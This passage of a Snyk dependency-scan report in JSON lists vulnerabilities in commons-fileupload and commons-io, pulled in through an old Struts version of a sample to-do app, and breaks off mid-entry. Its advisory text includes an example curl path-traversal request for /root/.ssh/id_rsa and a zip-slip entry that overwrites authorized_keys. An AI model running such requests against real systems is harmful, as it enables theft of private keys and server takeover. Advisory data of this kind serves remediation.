"https://github.com/apache/tomcat/commit/8999f8243197a5f8297d0cb1a0d86ed175678a77", - "title": "GitHub Commit" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1349475", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", 
- "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:46:48.463842Z" - }, - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:14.033291Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:46.791816Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:38.873057Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:48.463842Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:14.033291Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:46.791816Z" - } - ], - "description": "## Overview\n[commons-fileupload:commons-fileupload](https://mvnrepository.com/artifact/commons-fileupload/commons-fileupload) is a component that provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). 
It allows remote attackers to cause a denial of service (CPU consumption) via a long boundary string.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `commons-fileupload:commons-fileupload` to version 1.3.2 or higher.\n## References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201606.mbox/%3C6223ece6-2b41-ef4f-22f9-d3481e492832@apache.org%3E)\n- [Apache-SVN](http://svn.apache.org/viewvc/commons/proper/fileupload/trunk/RELEASE-NOTES.txt?r1=1745717&r2=1749637&diff_format=h)\n- [CVE Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3092)\n- [Github ChangeLog](https://github.com/apache/commons-fileupload/blob/b1498c9877d751f8bc4635a6f252ebdfcba28518/src/changes/changes.xml#L84)\n- [GitHub Commit](https://github.com/apache/tomcat80/commit/d752a415a875e888d8c8d0988dfbde95c2c6fb1d)\n- [GitHub Commit](https://github.com/apache/tomcat/commit/2c3553f3681baf775c50bb0b49ea61cb44ea914f)\n- [GitHub Commit](https://github.com/apache/tomcat/commit/8999f8243197a5f8297d0cb1a0d86ed175678a77)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1349475)\n", - "epssDetails": { - "percentile": "0.92395", - "probability": "0.04275", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-3092" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "commons-fileupload:commons-fileupload", - "proprietary": false, - "creationTime": "2016-12-25T16:51:56Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-06-22T16:51:56Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-fileupload", - "artifactId": "commons-fileupload" - }, - "publicationTime": "2016-12-25T16:51:56Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:46.791816Z", - "socialTrendAlert": false, - 
"severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "commons-fileupload:commons-fileupload@1.3.1" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.30", - "commons-fileupload:commons-fileupload@1.3.2" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "commons-fileupload:commons-fileupload", - "version": "1.3.1" - }, - { - "id": "SNYK-JAVA-COMMONSFILEUPLOAD-30401", - "title": "Arbitrary Code Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[1.1,1.3.3)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "1.3.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[1.1,1.3.3)" - ], - "functionId": { - "filePath": "org/apache/commons/fileupload/disk/DiskFileItem.java", - "className": "DiskFileItem", - "functionName": "readObject" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-fileupload:commons-fileupload", - "references": [ - { - "url": "https://github.com/apache/commons-fileupload/blob/master/src/changes/changes.xml%23L65", - "title": "Github ChangeLog" - }, - { - "url": "https://github.com/apache/commons-fileupload/commit/388e824518697c2c8f9f83fd964621d9c2f8fc4c", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1000031", - "title": "NVD" - }, - { - "url": "http://www.tenable.com/security/research/tra-2016-12", - "title": "Tenable Security" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:46:31.745804Z" - }, - { - "assigner": "SUSE", - "severity": "critical", - "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:50:04.225757Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:53:55.666846Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:58.367467Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:31.745804Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "SUSE", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:50:04.225757Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:55.666846Z" - } - ], - "description": "## Overview\n[`commons-fileupload:commons-fileupload`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22commons-fileupload%22)\nThe Apache Commons FileUpload library contains a Java Object that, upon deserialization, can be manipulated to write or copy files in arbitrary locations. If integrated with [`ysoserial`](https://github.com/frohoff/ysoserial), it is possible to upload and execute binaries in a single deserialization call.\n\n# Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n- Apache Blog\n\n## Remediation\nUpgrade `commons-fileupload` to version 1.3.3 or higher.\n\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1000031)\n- [Tenable Security](http://www.tenable.com/security/research/tra-2016-12)\n- [Github ChangeLog](https://github.com/apache/commons-fileupload/blob/master/src/changes/changes.xml#L65)\n- [Github Commit](https://github.com/apache/commons-fileupload/commit/388e824518697c2c8f9f83fd964621d9c2f8fc4c)\n", - "epssDetails": { - "percentile": "0.93419", - "probability": "0.05866", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-1000031" - ], - "CWE": [ - "CWE-284" - ] - }, - "packageName": "commons-fileupload:commons-fileupload", - "proprietary": false, - "creationTime": "2017-02-22T07:28:18.753000Z", - "functions_new": [ - { - "version": [ - "[1.1,1.3.3)" - ], - "functionId": { - "className": "org.apache.commons.fileupload.disk.DiskFileItem", - "functionName": "readObject" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2016-10-25T14:29:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-fileupload", - "artifactId": "commons-fileupload" - }, - "publicationTime": "2016-10-26T03:04:11.895000Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:55.666846Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - 
"commons-fileupload:commons-fileupload@1.3.1" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.37", - "commons-fileupload:commons-fileupload@1.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "commons-fileupload:commons-fileupload", - "version": "1.3.1" - }, - { - "id": "SNYK-JAVA-COMMONSFILEUPLOAD-31540", - "title": "Information Exposure", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,1.3.2)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "1.3.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.5, - "functions": [ - { - "version": [ - "[1.2.0 ,1.3.2)" - ], - "functionId": { - "filePath": "org/apache/commons/fileupload/FileUploadBase$FileItemIteratorImpl.java", - "className": "FileUploadBase$FileItemIteratorImpl", - "functionName": "" - } - }, - { - "version": [ - "[1.0-rc1,1.2.0)" - ], - "functionId": { - "filePath": "org/apache/commons/fileupload/FileUploadBase.java", - "className": "FileUploadBase", - "functionName": "parseRequest" - } - }, - { - "version": [ - "[,1.0-rc1)" - ], - "functionId": { - "filePath": "org/apache/commons/fileupload/FileUpload.java", - "className": "FileUpload", - "functionName": "parseRequest" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-fileupload:commons-fileupload", - "references": [ - { - "url": "https://github.com/apache/commons-fileupload/blob/master/src/changes/changes.xml%23L56", - "title": "Github ChangeLog" - }, - { - "url": "https://github.com/apache/commons-fileupload/commit/5b4881d7f75f439326f54fa554a9ca7de6d60814", - "title": "GitHub Commit" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - 
"modificationTime": "2024-03-06T14:03:17.073322Z" - } - ], - "description": "## Overview\r\n[`commons-fileupload:commons-fileupload`](https://commons.apache.org/proper/commons-fileupload/) provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.\r\n\r\nAffected versions of the package are vulnerable to Information Disclosure because the `InputStream` is not closed on exception.\r\n\r\n## Remediation\r\nUpgrade `commons-fileupload` to version 1.3.2 or higher.\r\n\r\n## References\r\n- [Github ChangeLog](https://github.com/apache/commons-fileupload/blob/master/src/changes/changes.xml#L56)\r\n- [Github Commit](https://github.com/apache/commons-fileupload/commit/5b4881d7f75f439326f54fa554a9ca7de6d60814)", - "epssDetails": null, - "identifiers": { - "CVE": [], - "CWE": [ - "CWE-200" - ] - }, - "packageName": "commons-fileupload:commons-fileupload", - "proprietary": false, - "creationTime": "2017-10-01T08:05:48.497000Z", - "functions_new": [ - { - "version": [ - "[1.2.0 ,1.3.2)" - ], - "functionId": { - "className": "org.apache.commons.fileupload.FileUploadBase$FileItemIteratorImpl", - "functionName": "" - } - }, - { - "version": [ - "[1.0-rc1,1.2.0)" - ], - "functionId": { - "className": "org.apache.commons.fileupload.FileUploadBase", - "functionName": "parseRequest" - } - }, - { - "version": [ - "[,1.0-rc1)" - ], - "functionId": { - "className": "org.apache.commons.fileupload.FileUpload", - "functionName": "parseRequest" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2014-02-17T22:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-fileupload", - "artifactId": "commons-fileupload" - }, - "publicationTime": "2017-02-17T08:05:48Z", - 
"severityBasedOn": "CVSS", - "modificationTime": "2024-03-06T14:03:17.073322Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "commons-fileupload:commons-fileupload@1.3.1" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.30", - "commons-fileupload:commons-fileupload@1.3.2" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "commons-fileupload:commons-fileupload", - "version": "1.3.1" - }, - { - "id": "SNYK-JAVA-COMMONSFILEUPLOAD-3326457", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Jakob Ackermann" - ], - "semver": { - "vulnerable": [ - "[1.0-beta-1, 1.5)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "1.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-fileupload:commons-fileupload", - "references": [ - { - "url": "https://lists.apache.org/thread/4xl4l09mhwg4vgsk7dxqogcjrobrrdoy", - "title": "Apache Mailing List" - }, - { - "url": "https://github.com/apache/commons-fileupload/commit/0a306f75949f2e9f5f92c400cad39d20117a2eb0", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/commons-fileupload/commit/e20c04990f7420ca917e96a84cec58b13a1b3d17", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/tomcat/commit/063e2e81ede50c287f737cc8e2915ce7217e886e", - "title": "GitHub Commit (Tomcat)" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:52:57.097583Z" - }, - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:52:59.094771Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:59.806365Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:49.130585Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:57.097583Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:59.094771Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:59.806365Z" - } - ], - "description": "## Overview\n[commons-fileupload:commons-fileupload](https://mvnrepository.com/artifact/commons-fileupload/commons-fileupload) is a component that provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) when an attacker sends a large number of request parts in a series of uploads or a single multipart upload.\r\n\r\n**NOTE:** After upgrading to the fixed version, the `setFileCountMax()` must be explicitly set to avoid this vulnerability.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a 
system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `commons-fileupload:commons-fileupload` to version 1.5 or higher.\n## References\n- [Apache Mailing List](https://lists.apache.org/thread/4xl4l09mhwg4vgsk7dxqogcjrobrrdoy)\n- [GitHub Commit](https://github.com/apache/commons-fileupload/commit/0a306f75949f2e9f5f92c400cad39d20117a2eb0)\n- [GitHub Commit](https://github.com/apache/commons-fileupload/commit/e20c04990f7420ca917e96a84cec58b13a1b3d17)\n- [GitHub Commit (Tomcat)](https://github.com/apache/tomcat/commit/063e2e81ede50c287f737cc8e2915ce7217e886e)\n", - "epssDetails": { - "percentile": "0.91407", - "probability": "0.03359", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-24998" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "commons-fileupload:commons-fileupload", - "proprietary": false, - "creationTime": "2023-02-21T08:19:49.294883Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-02-21T08:00:22Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-fileupload", - "artifactId": "commons-fileupload" - }, - "publicationTime": "2023-02-21T09:23:34.093821Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:59.806365Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "commons-fileupload:commons-fileupload@1.3.1" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@6.1.2", - "commons-fileupload:commons-fileupload@1.5" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "commons-fileupload:commons-fileupload", - "version": "1.3.1" - }, - { - 
"id": "SNYK-JAVA-COMMONSIO-1277109", - "title": "Directory Traversal", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:F", - "credit": [ - "Lukas Euler" - ], - "semver": { - "vulnerable": [ - "[0, 2.7)" - ] - }, - "exploit": "Functional", - "fixedIn": [ - "2.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-io:commons-io", - "references": [ - { - "url": "https://github.com/apache/commons-io/commit/fe7543eee5cd4b2f9e78aa44c31031b68eba204d", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/IO-556", - "title": "Jira Issue" - }, - { - "url": "https://github.com/AlAIAL90/CVE-2021-29425", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:49:20.715148Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", - "cvssV3BaseScore": 4.8, - "modificationTime": "2024-03-11T09:51:34.519777Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", - "cvssV3BaseScore": 4.8, - "modificationTime": "2024-03-11T09:53:56.345148Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:F", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:37.151008Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", - "assigner": "SUSE", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:20.715148Z" - }, - { - "type": "secondary", - "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 4.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:34.519777Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:56.345148Z" - } - ], - "description": "## Overview\n[commons-io:commons-io](https://search.maven.org/artifact/commons-io/commons-io) is a The Apache Commons IO library contains utility classes, stream implementations, file filters, file comparators, endian transformation classes, and much more.\n\nAffected versions of this package are vulnerable to Directory Traversal via calling the method FileNameUtils.normalize using an improper string like `//../foo` or `\\\\..\\foo`, which may allow access to files in the parent directory.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). 
In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 
20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `commons-io:commons-io` to version 2.7 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/commons-io/commit/fe7543eee5cd4b2f9e78aa44c31031b68eba204d)\n- [Jira Issue](https://issues.apache.org/jira/browse/IO-556)\n- [PoC](https://github.com/AlAIAL90/CVE-2021-29425)\n", - "epssDetails": { - "percentile": "0.54510", - "probability": "0.00171", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-29425" - ], - "CWE": [ - "CWE-20", - "CWE-22" - ], - "GHSA": [ - "GHSA-gwrp-pvrq-jmwv" - ] - }, - "packageName": "commons-io:commons-io", - "proprietary": false, - "creationTime": "2021-04-27T10:51:05.462338Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-04-26T16:04:00Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Functional", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-io", - "artifactId": "commons-io" - }, - "publicationTime": "2021-04-27T14:26:12Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:56.345148Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "commons-io:commons-io@2.2" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@6.0.0", - "commons-io:commons-io@2.9.0" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "commons-io:commons-io", - "version": "2.2" - }, - { - "id": "SNYK-JAVA-DOM4J-174153", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", - "credit": [ - "Mario 